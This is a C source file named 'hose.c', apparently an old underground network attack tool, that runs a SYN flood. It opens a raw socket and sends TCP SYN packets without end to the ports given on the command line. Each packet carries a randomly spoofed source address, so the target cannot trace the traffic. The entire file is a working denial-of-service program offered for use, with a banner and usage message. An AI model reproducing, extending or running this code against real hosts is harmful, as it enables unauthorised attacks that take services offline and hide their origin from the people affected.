#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>

#define PACKET_WAIT 1
#define SEQ 0x28374839
#define abyssver "[1;30m([1;34mab[0;34my[0ms[1;37ms[1;30m/[1;34mz[0;34m2k[1;30m)[0m\n"

int ports;
int sen;
int i;

char         *dsthost;
unsigned long dst;
unsigned long dstport[255];

void abort(void)
     {
	printf("# exiting...\n\n");
	close(sen);
	exit(0);
     }

void banner(void)
     {
	printf("(vivid)hose.c by prym\n");
	printf("\n");
     }

void usage(char *progname)
     {
        printf("%s", abyssver);
	printf("usage: %s <dst> <ports>\n",progname);
	exit(1);
     }

void parse_args(int argc, char *argv[])
     {
	dsthost              = argv[1];
	for (i=2;i<argc;i++)
	     {
		ports++;
		dstport[ports] = atoi(argv[i]);
	     }
     }

unsigned long resolve_host(char *resolve_me)
     {
	struct hostent *host;
	if ((host=gethostbyname(resolve_me))==NULL)
	     {
		printf("# unknown host %s\n", resolve_me);
		exit(1);
	     }
	return *(unsigned long *)host->h_addr;
     }

unsigned short in_cksum (u_short *addr,int len)
     {
	register int nleft  = len;
	register u_short *w = addr;
	register int sum    = 0;
	u_short answer      = 0;
	while (nleft > 1)
	     {
		sum  += *w++;
		nleft -= 2;
	     }
	if (nleft == 1)
	     {
		*(u_char *) (&answer) = *(u_char *) w;
		sum += answer;
	     }
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return (answer);
     }

void send_tcp_segment(struct iphdr *ip, struct tcphdr *tcp, char *data, int dlen)
     {
	char buf[65536];
	struct {
	unsigned long saddr;
	unsigned long daddr;
	char mbz;
	char ptcl;
	unsigned short tcpl;
	       } ph;
	struct sockaddr_in sin;
	ph.saddr = ip->saddr;
	ph.daddr = ip->daddr;
	ph.mbz=0;
	ph.ptcl = IPPROTO_TCP;
	ph.tcpl = htons(sizeof(*tcp)+dlen);
	memcpy(buf, &ph, sizeof(ph));
	memcpy(buf+sizeof(ph), tcp, sizeof(*tcp));
	memcpy(buf+sizeof(ph)+sizeof(*tcp), data, dlen);
	memset(buf+sizeof(ph)+sizeof(*tcp)+dlen, 0, 4);
	tcp->check=in_cksum(buf, (sizeof(ph)+sizeof(*tcp)+dlen+1)&~1);
	memcpy(buf, ip, 4*ip->ihl);
	memcpy(buf+4*ip->ihl, tcp, sizeof(*tcp));
	memcpy(buf+4*ip->ihl+sizeof(*tcp), data, dlen);
	memset(buf+4*ip->ihl+sizeof(*tcp)+dlen, 0, 4);
	ip->check=in_cksum(buf, (4*ip->ihl + sizeof(*tcp)+ dlen + 1) & ~1);
	memcpy(buf, ip, 4*ip->ihl);
	sin.sin_family=AF_INET;
	sin.sin_port=tcp->dest;
	sin.sin_addr.s_addr=ip->daddr;
	if(sendto(sen, buf, 4*ip->ihl + sizeof(*tcp)+ dlen, 0, &sin, sizeof(sin))<0)
	     {
		perror("# error: sending syn packet");
		exit(1);
	     }
     }

void main(int argc, char *argv[])
     {
	struct iphdr ip;
	struct tcphdr tcp;
	struct timeval tv;
	struct sockaddr_in sin;
	banner();
	signal(SIGINT, (void (*)())abort);
	if (argc<3) usage(argv[0]);
	parse_args(argc,argv);
	dst = resolve_host(dsthost);
	printf("# destination host - %s\n",dsthost);
	printf("# destination port(s)");
	for (i=1;i<ports+1;i++) printf(" - %d",dstport[i]);
	printf("\n");
	if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
	     {
		perror("# error: can not open socket");
		exit(1);
	     }
	ip.version=4;
	ip.ihl=5;
	ip.tos=0;
	ip.frag_off=0;
	ip.ttl=30;
	ip.protocol=IPPROTO_TCP;
	ip.check=0;
	ip.daddr=dst;
	tcp.ack_seq=0;
	tcp.res1=0;
	tcp.fin=0;
	tcp.syn=1;
	tcp.rst=0;
	tcp.psh=0;
	tcp.ack=0;
	tcp.urg=0;
	tcp.res2=0;
	tcp.urg_ptr=0;
	printf("# hosing...\n");
	printf("# press ^c to end...\n");
	for (;;)
	     {
		for (i=1;i<ports+1;i++)
		     {
			ip.saddr=rand();
			ip.tot_len=sizeof(ip)+sizeof(tcp);
			ip.id=htons(random());
			tcp.source=htons(1024+rand()%32000);
			tcp.dest=htons(dstport[i]);
			tcp.seq=htonl(SEQ);
			tcp.doff=sizeof(tcp)/4;
			tcp.window=htons(65535);
			tcp.check=0;
			gettimeofday(&tv, 0);
			send_tcp_segment(&ip, &tcp, "", 0); 
			usleep(PACKET_WAIT);
		     }
	     }
     }
